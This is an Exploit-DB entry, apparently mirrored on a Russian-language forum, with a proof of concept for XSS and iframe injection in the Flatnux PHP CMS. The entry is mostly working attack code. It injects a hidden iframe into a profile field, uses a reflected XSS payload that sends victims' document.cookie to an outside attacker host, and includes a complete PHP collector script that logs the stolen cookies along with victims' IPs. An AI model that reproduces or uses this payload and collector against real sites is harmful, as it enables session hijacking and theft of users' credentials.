- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7938
- Проверка EDB
-
- Пройдено
- Автор
- ALFONS LUJA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-02-02
Код:
/*
- Flatnux-2009-01-27 XSS/Iframe injection p0c
+ 1] Create acount
+ 1] Go to http://localhost/~flatnux/?mod=login&op=modprof&user=[username]
- Set iframe in the Job fields
(Jobless l0l<iframe src=http://0xc00000fdh.boo.pl/flatnux_ost.php style="visibility:hidden;width:0px;height:0px"></iframe>)
+ 3] Now m4k3 frieNdship witch Sheep
Greetings : cOndemned , sid.psycho , wszyscy których ników nie umie wymówić :P
and Biggest 4 g0rion l0l
"... droga jest ważniejsza od celu .... :P"
http://www.wrzuta.pl/audio/iL4UkPk6YK/
Alfons Luja
*/
<script type="text/javascript">
path = "http://localhost/~flatnux/index.php?mod=02_Flatforum\"><script>location.href=\"http://0xc00000fdh.boo.pl/collector.php?kuka=\"%2Bdocument.cookie;<%2Fscript>";
location.href = path;
</script>
/*++++++++++++++++++collector.php++++++++++++++++++++++
<?php
if(isset($_GET['kuka'])){
$gethim = $_GET['kuka'];
$data = "KUKI_GRABER:\n";
$data.= date("dmY H:i:s")."\n";
$data.= "REFERER: ".$_SERVER['HTTP_REFERER']."\n";
$data.= "IP: ".$_SERVER['REMOTE_ADDR']."\n";
$data.= "CIACHO: ".$gethim."\n";
$hnd = fopen("KUKI_FLATNUX.TXT","a");
if(!hnd) exit(666);
flock($hnd,LOCK_EX);
fwrite($hnd,$data);
flock($hnd,LOCK_UN);
fclose($hnd);
}
?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
# milw0rm.com [2009-02-02]
- Источник
- www.exploit-db.com